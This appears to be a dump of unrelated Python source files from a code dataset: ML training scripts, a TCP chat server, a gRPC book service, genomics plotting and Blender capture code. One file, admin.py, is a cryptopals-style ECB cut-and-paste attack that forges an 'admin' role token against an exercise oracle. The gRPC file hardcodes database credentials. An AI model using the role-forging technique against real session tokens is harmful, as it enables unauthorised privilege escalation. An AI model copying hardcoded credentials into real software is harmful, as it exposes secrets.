%(average_loss,time_one_epoch))\r\n\r\n\r\n\r\n valid_start_time = time.time()\r\n mae,mse=0,0\r\n total_val_loss=0\r\n num_val=0\r\n # Loop through all the images.\r\n for blob in data_loader_val:\r\n num_val+=1\r\n # Read the image and the ground truth\r\n val_image_r=blob['data']\r\n val_density_r=blob['gt_density']\r\n tru_count=np.sum(val_density_r)\r\n # Prepare the feed_dict\r\n feed_dict_data = {\r\n input_img: val_image_r,\r\n input_den: val_density_r,\r\n }\r\n\r\n # Compute the loss per image\r\n val_loss,val_den = sess.run([loss,pre_den], feed_dict=feed_dict_data)\r\n pre_count=np.sum(val_den)\r\n mae+=abs(pre_count-tru_count)\r\n mse+=(pre_count-tru_count)*(pre_count-tru_count)\r\n # Accumulate the validation loss across all the images.\r\n total_val_loss = total_val_loss +val_loss\r\n mae=mae/num_val\r\n mse=np.sqrt(mse/num_val)\r\n if mae j:\n return -1 \n \n mid = (i+j)//2\n if nums[mid] == target:\n return mid \n elif nums[mid] < target:\n return self.binarySearch(mid+1,j,nums,target)\n else:\n return self.binarySearch(i,mid-1,nums,target)\n \nif __name__ == \"__main__\":\n bs = Solution()\n nums = [3, 5, 7, 9, 10, 90, 100, 130, 140, 160, 170] \n print(bs.search(nums,10))\n","sub_path":"InfiniteSearch.py","file_name":"InfiniteSearch.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"515916091","text":"import csv\nimport math\n\nfrom PIL import Image\nimport numpy as np\nfrom keras.models import load_model\nimport tensorflow as tf\nfrom keras import Model\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau, 
Callback\nfrom keras.layers import Conv2D, Reshape, Dense, GlobalAveragePooling2D, MaxPooling2D, Activation, Input\nfrom keras.applications.mobilenet import preprocess_input\nfrom keras.utils import Sequence\nfrom keras.optimizers import Adam\nfrom keras.backend import epsilon\n\n# 0.35, 0.5, 0.75, 1.0\nALPHA = 0.35\n\n# 96, 128, 160, 192, 224\nIMAGE_SIZE = 224\n\nEPOCHS = 100\nBATCH_SIZE = 5\nPATIENCE = 20\nimage_width = 640.0\nimage_height = 480.0\n\nTRAIN_CSV = \"training.csv\"\nVALIDATION_CSV = \"validation.csv\"\n\nclass DataGenerator(Sequence):\n\n def __init__(self, csv_file):\n self.paths = []\n\n with open(csv_file, \"r\") as file:\n self.coords = np.zeros((sum(1 for line in file), 4))\n file.seek(0)\n\n reader = csv.reader(file, delimiter=\",\")\n for index, row in enumerate(reader):\n path, x1, x2, y1, y2 = row\n x1=np.float32(x1)\n x2=np.float32(x2)\n y1=np.float32(y1)\n y2=np.float32(y2)\n self.coords[index, 0] = (x1 * IMAGE_SIZE) / image_width\n self.coords[index, 1] = (x2 * IMAGE_SIZE) / image_width\n self.coords[index, 2] = (y1 * IMAGE_SIZE) / image_height\n self.coords[index, 3] = (y2 * IMAGE_SIZE) / image_height\n path1='/home/sounak/FlipkartGRiDLevel3/train/'+path \n self.paths.append(path1)\n\n def __len__(self):\n return math.ceil(len(self.coords) / BATCH_SIZE)\n\n def __getitem__(self, idx):\n batch_paths = self.paths[idx * BATCH_SIZE:(idx + 1) * BATCH_SIZE]\n batch_coords = self.coords[idx * BATCH_SIZE:(idx + 1) * BATCH_SIZE]\n\n batch_images = np.zeros((len(batch_paths), IMAGE_SIZE, IMAGE_SIZE, 3), dtype=np.float32)\n for i, f in enumerate(batch_paths):\n img = Image.open(f)\n img = img.resize((IMAGE_SIZE, IMAGE_SIZE))\n img = img.convert('RGB')\n\n batch_images[i] = preprocess_input(np.array(img, dtype=np.float32))\n img.close()\n\n return batch_images, batch_coords\n\nclass Validation(Callback):\n def __init__(self, generator):\n self.generator = generator\n\n def on_epoch_end(self, epoch, logs):\n mse = 0\n\n intersections = 0\n unions = 0\n\n for i in range(len(self.generator)):\n batch_images, gt = self.generator[i]\n pred = self.model.predict_on_batch(batch_images)\n mse += np.linalg.norm(gt - pred, ord='fro') / pred.shape[0]\n\n pred = np.maximum(pred, 0)\n\n diff_width = np.minimum(gt[:,0] + gt[:,1], pred[:,0] + pred[:,1]) - np.maximum(gt[:,0], pred[:,0])\n diff_height = np.minimum(gt[:,2] + gt[:,3], pred[:,2] + pred[:,3]) - np.maximum(gt[:,2], pred[:,2])\n intersection = np.maximum(diff_width, 0) * np.maximum(diff_height, 0)\n\n area_gt = gt[:,1] * gt[:,3]\n area_pred = pred[:,1] * pred[:,3]\n union = np.maximum(area_gt + area_pred - intersection, 0)\n\n intersections += np.sum(intersection * (union > 0))\n unions += np.sum(union)\n\n iou = np.round(intersections / (unions + epsilon()), 4)\n logs[\"val_iou\"] = iou\n\n mse = np.round(mse, 4)\n logs[\"val_mse\"] = mse\n\n\n print(\" - val_iou: {} - val_mse: {}\".format(iou, mse))\n\n\ndef create_model():\n img_input = Input((224, 224, 3))\n x = Conv2D(16, kernel_size=(3, 3), strides=(1, 1), padding='same')(img_input)\n x = Activation('relu')(x)\n x = MaxPooling2D((4, 4), strides=(2, 2))(x)\n x = Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding='same')(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((4, 4), strides=(2, 2))(x)\n x = Conv2D(32, kernel_size=(3, 3), strides=(2, 2))(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((4, 4), strides=(2, 2))(x)\n x = Conv2D(32, kernel_size=(2, 2), strides=(2, 2))(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((4, 4), strides=(2, 2))(x)\n x = Conv2D(4, 
kernel_size=(2, 2))(x)\n x = Reshape((4,), name=\"coords\")(x)\n return Model(inputs=img_input, outputs=x)\n\n\ndef log_mse(y_true, y_pred):\n return tf.reduce_mean(tf.log1p(tf.squared_difference(y_pred, y_true)), axis=-1)\n\ndef main():\n model=load_model('/home/sounak/FlipkartGRIDNew/model-0.87_Final.h5', custom_objects={'log_mse':log_mse})\n\n train_datagen = DataGenerator(TRAIN_CSV)\n validation_datagen = Validation(generator=DataGenerator(VALIDATION_CSV))\n\n optimizer = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\n model.compile(loss=log_mse, optimizer=optimizer, metrics=[])\n checkpoint = ModelCheckpoint(\"model-{val_iou:.2f}_3.h5\", monitor=\"val_iou\", verbose=1, save_best_only=True, mode=\"max\")\n stop = EarlyStopping(monitor=\"val_iou\", patience=PATIENCE, mode=\"max\")\n reduce_lr = ReduceLROnPlateau(monitor=\"val_iou\", factor=0.2, patience=10, min_lr=1e-7, verbose=1, mode=\"max\")\n\n model.summary()\n\n model.fit_generator(generator=train_datagen, epochs=EPOCHS, callbacks=[validation_datagen, checkpoint, reduce_lr, stop])\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"grid_level3.py","file_name":"grid_level3.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"217524995","text":"#!/usr/bin/env python3\nimport user\nimport pad\n\n\ndef _main():\n # Oracle looks like:\n # email=foo@bar.com&uid=10&role=user\n\n # Plan: get the role=user part to be at the start of a block,\n # and cut it out. Then paste in the encryption for\n # role=admin. It is that easy.\n uid_len = len('&uid=10&')\n role_prefix_len = len('role=')\n email_prefix_len = len('email=')\n\n # We need to block align the 'user' so we can cut it out.\n total_len = email_prefix_len + role_prefix_len + uid_len\n desired_email_len = (((total_len // 16) + 1) * 16) - total_len\n email = 'a' * desired_email_len\n cipher = user.oracle(email) \n \n print('Current user:', user.unoracle(cipher))\n\n # Cut out the 'user'.\n cipher = cipher[:-16]\n\n # To put in an admin, we must figure out how it is encrypted.\n # We do this by aligning it in the email as a padded block\n # and then select it from the ciphertext.\n desired_real_email_len = 16 - email_prefix_len\n real_email = 'a' * desired_real_email_len\n email = real_email + pad.pkcs7(b'admin', 16).decode('ascii')\n cipher_2 = user.oracle(email)\n\n # Now the second block should be the encrypted form of the\n # well-padded 'admin' text.\n admin_cipher = cipher_2[16:32]\n\n # Now paste that on to our old user account.\n cipher += admin_cipher\n\n print('Newly adminified:', user.unoracle(cipher))\n\n\nif __name__ == '__main__':\n _main()\n","sub_path":"2set/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"65041572","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef nothing_to_do(x) :\n\tpass\n\nif __name__ == '__main__' :\n\tcap = cv2.VideoCapture(0)\n\t\n\tcv2.namedWindow('frame')\n\tcv2.createTrackbar('K', 'frame', 1, 21, nothing_to_do)\n\n\twhile(True) :\n\t\tret, frame = cap.read()\n\t\t\n\t\tk = cv2.getTrackbarPos('K', 'frame')\n\t\tif k == 0:\n\t\t\tk = 1\n## Do blur\n\t\tkernel = np.ones((k, k), np.float32) / (k*k)\n\t\tframe = cv2.filter2D(frame, -1, kernel)\n\n# Image flipping\n\t\tframe = cv2.flip(frame, 1)\n\t\tcv2.imshow('frame', frame)\n\t\tif cv2.waitKey(1) & 
0xFF == ord('q') :\n\t\t\tbreak\n\n\tcap.release()\n\tcv2.destroyAllWindows()\n","sub_path":"code/02-mac_cam.py","file_name":"02-mac_cam.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"170021094","text":"\"\"\"This module contains all available rules.\"\"\"\n\nimport random\n\n\nclass Card:\n card_by_name = dict()\n\n @staticmethod\n def play(*args, **kwargs):\n raise NotImplementedError()\n\n\nclass ShuffleTurnOrder(Card):\n @staticmethod\n def play(*args, **kwargs):\n game = kwargs.get('game', None)\n if game:\n random.shuffle(game.participants)\n\n\nclass ReverseTurnOrder(Card):\n @staticmethod\n def play(*args, **kwargs):\n game = kwargs.get('game', None)\n if game:\n # turn_id = 3, len = 5\n # [1, 2, 3, 4, 5]\n # ^\n # 4 → Reverse Turn Order\n # [5, 4, 3, 2, 1]\n #\n # [2, 1, 5, 4, 3]\n # ^\n game.participants.reverse()\n split = len(game.participants) - (game.current_turn - 1) % len(game.participants)\n game.participants = game.participants[split:] + game.participants[:split]\n\n\nclass SkipNextTurn(Card):\n @staticmethod\n def play(*args, **kwargs):\n game = kwargs.get('game', None)\n if game:\n game.next_turn()\n","sub_path":"four_in_a_row_online/data/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"448253931","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*- \n\"\"\" \n@author:kevinlee \n@file: tcp_server.py \n@time: 2018/02/09 \n\"\"\"\nimport socket, time, threading\n\ninputs = []\n\n\ndef tcplink(sock, addr):\n print('Accept new connection from %s:%s...' % addr)\n sock.send(b'welcome')\n while True:\n data = sock.recv(1024)\n time.sleep(1)\n if data.decode('utf-8') == 'bye':\n sock.send(b'bye')\n inputs.remove(sock)\n break\n for other in inputs:\n other.send(b'%s say: %s' % (str(addr[0]).encode('utf-8'), str(data).encode('utf-8')))\n sock.close()\n print('Connection from %s:%s closed.' 
% addr)\n\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(('0.0.0.0', 9999))\ns.listen(5)\nwhile True:\n sock, addr = s.accept()\n inputs.append(sock)\n t = threading.Thread(target=tcplink, args=(sock, addr))\n t.start()\n","sub_path":"tcp_server.py","file_name":"tcp_server.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"85701946","text":"\nfrom grpcalchemy import DefaultConfig\nfrom models import Book\nimport sqlalchemy\nfrom sqlalchemy.orm import sessionmaker\nfrom grpcalchemy.orm import Message, StringField\nfrom grpcalchemy import Server, Context, grpcmethod\nfrom typing import List\nfrom models import Book , Record\n\nengine = sqlalchemy.create_engine(\n 'mysql://lab:osmentos@mysqldb:3306/library2', echo=True)\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\nclass BookDetailsFields(Message):\n book_name: str\n author_name: str\n description: str\n condition: str\n\n\nclass AvailablebookFields(Message):\n book_name: str\n author_name: str\n\n\nclass BookDetailsRequestmesg(Message):\n book_id: int\n\nclass AvailableRequestMesg(Message):\n\tNone\nclass BookRecordRequestMesg(Message):\n\tbook_id: int\n\nclass BookDetailsResponseMesg(Message):\n\tbooks: List[BookDetailsFields]\n\n\nclass AvailableResponseMesg(Message):\n availablebooks: List[AvailablebookFields]\n\nclass BookRecordResponseMesg(Message):\n\tcount: int\n\nclass GetBookdetails(Server):\n @grpcmethod\n def bookDetails(self, request: BookDetailsRequestmesg, context: Context) -> BookDetailsResponseMesg:\n book_1 = session.query(Book).filter_by(\n id=request.book_id).first()\n x = BookDetailsFields()\n x.book_name = book_1.book_name\n x.author_name = book_1.author_name\n x.description = book_1.description\n x.condition = book_1.condition\n return BookDetailsResponseMesg(books=[x])\n\n @grpcmethod\n def availableBooks(self, request: AvailableRequestMesg , context: Context) -> AvailableResponseMesg:\n available_book = session.query(Book).filter_by(\n is_available=True).all()\n arr = []\n for book in available_book:\n \tx = AvailablebookFields()\n \tx.book_name = book.book_name\n \tx.author_name = book.author_name\n \tarr.append(x)\n return AvailableResponseMesg(availablebooks=arr)\n\n @grpcmethod\n def bookRecord(self, request:BookRecordRequestMesg , context: Context) -> BookRecordResponseMesg:\n \tissuecount=session.query(Record).filter_by(\n id=request.book_id).count()\n \treturn BookRecordResponseMesg(count=issuecount)\n\n\nclass TestConfig(DefaultConfig):\n GRPC_SEVER_REFLECTION_ENABLE = True\n\n\nif __name__ == '__main__':\n GetBookdetails.run(host=\"library\", port=50059, config=TestConfig())\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"608117202","text":"#!/usr/bin/env python\nimport matplotlib\nmatplotlib.use('Agg')\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport argparse\nimport os\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-a','--conditionA',help='the snp profile in condition A')\nparser.add_argument('-b','--conditionB',help='the snp profile in condition B')\nparser.add_argument('-n','--conditionAName',help='name of condition A')\nparser.add_argument('-l','--conditionBLabel',help='name of condition B')\nparser.add_argument('-c','--chr',help='the chromosome number of the segment. Example,\\
use 
chr1 instead of 1')\nparser.add_argument('-s','--start',help='the start position of the segment')\nparser.add_argument('-e','--end',help='the end position of the segment')\nparser.add_argument('-t','--truth',help='the truth snp profile')\nparser.add_argument('-o','--outdir',default='.',help='the output directory')\nargs = parser.parse_args()\n\ndef LoadSNPObsertData(filename,chrname,start,end):\n df = pd.read_table(filename,header=None)\n df.columns = ['chr','location','maf','coverage']\n return df[(df.chr == chrname)&(df.location > start-1)&(df.location < end+1)]\n \ndef LoadTruthSNPData(filename,chrname,start,end):\n df = pd.read_table(filename,header=None)\n df.columns = ['chr','location','code']\n return df[(df.chr == chrname)&(df.location > start-1)&(df.location < end+1)]\n\ndef Difference(df1,df2,on):\n columnname = df1.columns\n columnsize = len(columnname)\n df = pd.merge(df1,df2,how='left',on=on)\n df = df[df[df.columns[columnsize]].isnull()]\n df = df.ix[:,:columnsize]\n df.columns = columnname\n df.index = range(len(df))\n return df\n \ndef PlotSNPCoverage(comm,diff1,diff2,outdir,xlabel=None,ylabel=None,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.plot(comm.coverage_x,comm.coverage_y,'o',alpha=0.7)\n comm_min = np.min([np.min(comm.coverage_x),np.min(comm.coverage_y)])\n comm_max = np.max([np.max(comm.coverage_x),np.max(comm.coverage_y)])\n diff1_min = diff2_min = comm_min\n diff1_max = diff2_max = comm_max\n if len(diff1) != 0:\n diff1_min = np.min(diff1.coverage)\n diff1_max = np.max(diff1.coverage)\n if len(diff2) != 0:\n diff2_min = np.min(diff2.coverage)\n diff2_max = np.max(diff2.coverage)\n minvalue = np.min([comm_min,diff1_min,diff2_min])\n maxvalue = np.max([comm_max,diff1_max,diff2_max])\n if len(diff1) != 0:\n plt.plot(diff1.coverage,[minvalue-1]*len(diff1),'o',color='r',alpha=0.5)\n if len(diff2) != 0:\n plt.plot([minvalue-1]*len(diff2),diff2.coverage,'o',color='r',alpha=0.5)\n plt.plot([minvalue-1.5,maxvalue+1],[minvalue-1.5,maxvalue+1])\n plt.xlim([minvalue-1.5,maxvalue+0.5])\n plt.ylim([minvalue-1.5,maxvalue+0.5])\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.07,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_coverage.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotSNPMaf(comm,diff1,diff2,outdir,xlabel=None,ylabel=None,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.plot(comm.maf_x,comm.maf_y,'o',alpha=0.7)\n comm_min = np.min([np.min(comm.maf_x),np.min(comm.maf_y)])\n comm_max = np.max([np.max(comm.maf_x),np.max(comm.maf_y)])\n diff1_min = diff2_min = comm_min\n diff1_max = diff2_max = comm_max\n if len(diff1) != 0:\n diff1_min = np.min(diff1.maf)\n diff1_max = np.max(diff1.maf)\n if len(diff2) != 0:\n diff2_min = np.min(diff2.maf)\n diff2_max = np.max(diff2.maf)\n minvalue = np.min([comm_min,diff1_min,diff2_min])\n maxvalue = np.max([comm_max,diff1_max,diff2_max])\n if len(diff1) != 0:\n plt.plot(diff1.maf,[minvalue-0.03]*len(diff1),'o',color='r',alpha=0.5)\n if len(diff2) != 0:\n plt.plot([minvalue-0.03]*len(diff2),diff2.maf,'o',color='r',alpha=0.5)\n plt.plot([minvalue-0.1,maxvalue+0.1],[minvalue-0.1,maxvalue+0.1])\n plt.xlim([minvalue-0.05,maxvalue+0.01])\n plt.ylim([minvalue-0.05,maxvalue+0.01])\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.07,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = 
os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_maf.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotRatioOfSNPCoverage(comm,outdir,ylabel=None,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.plot(range(len(comm)),[col['coverage_x']*1.0/col['coverage_y'] for ix,col\n in comm.iterrows()],'o',alpha=0.7)\n plt.hlines(y=1.0,xmin=-1,xmax=len(comm)+1)\n plt.xlim([-1,len(comm)+1])\n plt.xlabel('snp index')\n plt.ylabel(ylabel)\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.07,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_coverage_ratio.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotRatioOfSNPMaf(comm,outdir,ylabel=None,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.plot(range(len(comm)),[col['maf_x']*1.0/col['maf_y'] for ix,col\n in comm.iterrows()],'o',alpha=0.7)\n plt.hlines(y=1.0,xmin=-1,xmax=len(comm)+1)\n plt.xlim([-1,len(comm)+1])\n plt.xlabel('snp index')\n plt.ylabel(ylabel)\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.07,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_maf_ratio.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotSNPCoverageDistribution(df1,df2,outdir,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.hist(df1.coverage,bins=15,alpha=0.7)\n plt.hist(df2.coverage,bins=15,alpha=0.7)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.06,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n plt.xlabel('snp coverage')\n plt.ylabel('snp count')\n plt.title(title)\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_coverage_distribution.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotSNPMafDistribution(df1,df2,outdir,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.hist(df1.maf,bins=15,alpha=0.7)\n plt.hist(df2.maf,bins=15,alpha=0.7)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.06,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n plt.xlabel('snp maf')\n plt.ylabel('snp count')\n plt.title(title)\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig('snp_maf_distribution.png',format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotSNPCoverageTFDistribution(rdf,wdf,outdir,outfilename,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.hist(rdf.coverage,bins=6,alpha=0.7)\n plt.hist(wdf.coverage,bins=6,alpha=0.7)\n plt.xlabel('snp coverage')\n plt.ylabel('snp count')\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.06,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig(outfilename,format='png',dpi=300)\n os.chdir(curpath)\n\ndef PlotSNPMafTFDistribution(rdf,wdf,outdir,outfilename,title=None):\n fig,ax = plt.subplots(nrows=1,ncols=1)\n plt.hist(rdf.maf,bins=6,alpha=0.7)\n plt.hist(wdf.maf,bins=6,alpha=0.7)\n plt.xlabel('snp maf')\n plt.ylabel('snp count')\n plt.title(title)\n plt.subplots_adjust(top=0.96,bottom=0.06,left=0.06,right=0.98)\n fig.set_size_inches([ 9.59, 9.52])\n curpath = os.path.abspath('.')\n os.chdir(outdir)\n plt.savefig(outfilename,format='png',dpi=300)\n os.chdir(curpath)\n\nif __name__ == '__main__':\n chrname = args.chr\n start = int(args.start)\n end = int(args.end)\n df1 = LoadSNPObsertData(args.conditionA,chrname,start,end)\n df2 = LoadSNPObsertData(args.conditionB,chrname,start,end)\n truth = LoadTruthSNPData(args.truth,chrname,start,end)\n path = 
args.outdir.strip()\n isExists = os.path.exists(path)\n if not isExists:\n os.makedirs(path)\n\n comm = pd.merge(df1,df2,on=['chr','location'])\n diff1 = Difference(df1,df2,on=['chr','location'])\n diff2 = Difference(df2,df1,on=['chr','location'])\n xlabel = args.conditionAName + ' snp coverage'\n ylabel = args.conditionBLabel + ' snp coverage'\n title = \"%s:%d-%d snp coverage\" % (chrname,start,end)\n PlotSNPCoverage(comm,diff1,diff2,path,xlabel,ylabel,title)\n \n xlabel = args.conditionAName + ' snp maf'\n ylabel = args.conditionBLabel + ' snp maf'\n PlotSNPMaf(comm,diff1,diff2,path,xlabel,ylabel,title)\n\n ylabel = '(snp coverage in %s)/(snp coverage in %s)' % (args.conditionAName,\n args.conditionBLabel)\n title = \"%s:%d-%d ratio of snp coverage\" % (chrname,start,end)\n PlotRatioOfSNPCoverage(comm,path,ylabel,title)\n\n ylabel = '(snp maf in %s)/(snp maf in %s)' % (args.conditionAName,\n args.conditionBLabel)\n title = \"%s:%d-%d ratio of snp maf\" % (chrname,start,end)\n PlotRatioOfSNPMaf(comm,path,ylabel,title)\n\n title = \"%s:%d-%d snp coverage distribution\" % (chrname,start,end)\n PlotSNPCoverageDistribution(df1,df2,path,title)\n \n title = \"%s:%d-%d snp maf distribution\" % (chrname,start,end)\n PlotSNPMafDistribution(df1,df2,path,title)\n\n rdf = pd.merge(df1,truth,on=['chr','location'])\n wdf = Difference(df1,truth,on=['chr','location'])\n outfilename = '%s_snp_TF_maf_distribution.png' % args.conditionAName\n title = '%s:%d-%d %s snp maf distribution' % (chrname,start,end,args.conditionAName)\n PlotSNPMafTFDistribution(rdf,wdf,path,outfilename,title)\n \n outfilename = '%s_snp_TF_coverage_distribution.png' % args.conditionAName\n title = '%s:%d-%d %s snp coverage distribution' % (chrname,start,end,args.conditionAName)\n PlotSNPCoverageTFDistribution(rdf,wdf,path,outfilename,title)\n\n rdf = pd.merge(df2,truth,on=['chr','location'])\n wdf = Difference(df2,truth,on=['chr','location'])\n outfilename = '%s_snp_TF_maf_distribution.png' % args.conditionBLabel\n title = '%s:%d-%d %s snp maf distribution' % (chrname,start,end,args.conditionBLabel)\n PlotSNPMafTFDistribution(rdf,wdf,path,outfilename,title)\n \n outfilename = '%s_snp_TF_coverage_distribution.png' % args.conditionBLabel\n title = '%s:%d-%d %s snp coverage distribution' % (chrname,start,end,args.conditionBLabel)\n PlotSNPCoverageTFDistribution(rdf,wdf,path,outfilename,title)","sub_path":"pltsegmaf.py","file_name":"pltsegmaf.py","file_ext":"py","file_size_in_byte":10494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"300789034","text":"import bpy\n\nfrom . import data_structures\nfrom . import utils\nfrom . import runtime\nfrom . import messages\nfrom . import sensors\nfrom . import matrix_generator\nfrom . 
import filter  # nb: this package-relative module shadows Python's builtin filter() in this file\n\nfrom math import isinf\nfrom math import radians\nfrom mathutils import *\n\nmillisecondsPerSecond = 1000\n\naccelerometerRecord = sensors.AccelerationSensor() # Result needs to be integrated twice\nmagneticFieldSensorRecord = sensors.PositionSensor() # Result doesn't need to be integrated\ngyroscopeRecord = sensors.SpeedSensor() # Result needs to be integrated once\n\n#\n#\tResets all the data for a fresh capture session\n#\ndef resetData():\n\truntime.firstTS = {}\n\truntime.currentOrientation = {}\n\truntime.currentPosition = {}\n\truntime.transformationMatrix = {}\n\n#\n#\tReturns the bone object by the given rig and bone name\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef getBoneByData( selectedRig, selectedBone ):\n\tobj = bpy.data.objects[selectedRig]\n\treturn obj.pose.bones[selectedBone]\n\t\n#\n#\tReturns the difference in the orientation\n#\tbetween the current and the new orientation\n#\tbased on the values that were given by the\n#\tgyroscope.\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef getDeltaOrientation( selectedRig, selectedBone ):\n\tnewOrientation = gyroscopeRecord.get( selectedRig, selectedBone )\n\tnewOrientation = Vector( (-newOrientation[0], -newOrientation[1], -newOrientation[2]) )\n\t\n\tfilteredOrientation = filter.applyOrientationFilter( selectedRig, selectedBone, newOrientation )\n\t\n\tif selectedRig not in runtime.currentOrientation:\n\t\truntime.currentOrientation[selectedRig] = {}\n\t\n\tif selectedBone not in runtime.currentOrientation[selectedRig]:\n\t\truntime.currentOrientation[selectedRig][selectedBone] = filteredOrientation\n\t\n\toutput = runtime.currentOrientation[selectedRig][selectedBone]-filteredOrientation\n\t\n\tsetNewOrientation( selectedRig, selectedBone, filteredOrientation )\n\t\n\treturn output\n\n#\n#\tTransforms a raw accelerometer reading into the rig's coordinate system\n#\tusing the transformation matrix transmitted for this bone.\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param tuple recordedTranslation\ndef applyCoordinateTransformation( selectedRig, selectedBone, recordedTranslation ):\n\tmatrix = getTransformationMatrix( selectedRig, selectedBone )\n\t\n\tmagnetData = magneticFieldSensorRecord.get( selectedRig, selectedBone )\n\tfilteredTranslation = filter.applyAccelerometerFilter( selectedRig, selectedBone, recordedTranslation, magnetData )\n\t\n\trecordedTranslationVector = Vector( (filteredTranslation[0], filteredTranslation[1], filteredTranslation[2], 1.0) )\n\t\n\treturn matrix * recordedTranslationVector\n\t\n#\n#\tReturns the difference between the cumulated position and the newly calculated one\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef getDeltaTranslation( selectedRig, selectedBone ):\n\trecordedTranslation = accelerometerRecord.get( selectedRig, selectedBone )\n\tnewPosition = applyCoordinateTransformation( selectedRig, selectedBone, recordedTranslation )\n\t\n\tif selectedRig not in runtime.currentPosition:\n\t\truntime.currentPosition[selectedRig] = {}\n\t\n\tif selectedBone not in runtime.currentPosition[selectedRig]:\n\t\truntime.currentPosition[selectedRig][selectedBone] = newPosition\n\t\n\toutput = runtime.currentPosition[selectedRig][selectedBone]-newPosition\n\t\n\tsetNewPosition( selectedRig, selectedBone, newPosition )\n\t\n\treturn output\n\n#\n#\tOverride position for bone identified by given data\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param vector3 newPosition\ndef setNewPosition( selectedRig, selectedBone, newPosition 
):\n\truntime.currentPosition[selectedRig][selectedBone] = newPosition\n\t\n#\n#\tOverride orientation for bone identified by given data\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\n#\t@param vector3 newOrientation\ndef setNewOrientation( selectedRig, selectedBone, newOrientation ):\n\truntime.currentOrientation[selectedRig][selectedBone] = newOrientation\n\n#\n#\tTODO\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef setTransformationMatrix( selectedRig, selectedBone, transmittedData ):\n\tif selectedRig not in runtime.transformationMatrix:\n\t\truntime.transformationMatrix[selectedRig] = {}\n\t\t\n\truntime.transformationMatrix[selectedRig][selectedBone] = createTransformationMatrixFromData( transmittedData )\n\n#\n#\tTODO\n#\n#\t@param dictionary transmittedData\ndef createTransformationMatrixFromData( transmittedData ):\n\treturn matrix_generator.createTransformationMatrixFromData( transmittedData )\n\t\n#\n#\tReturns the coordinate transformation matrix for the selected bone\n#\n#\t@param string selectedRig\n#\t@param string selectedBone\ndef getTransformationMatrix( 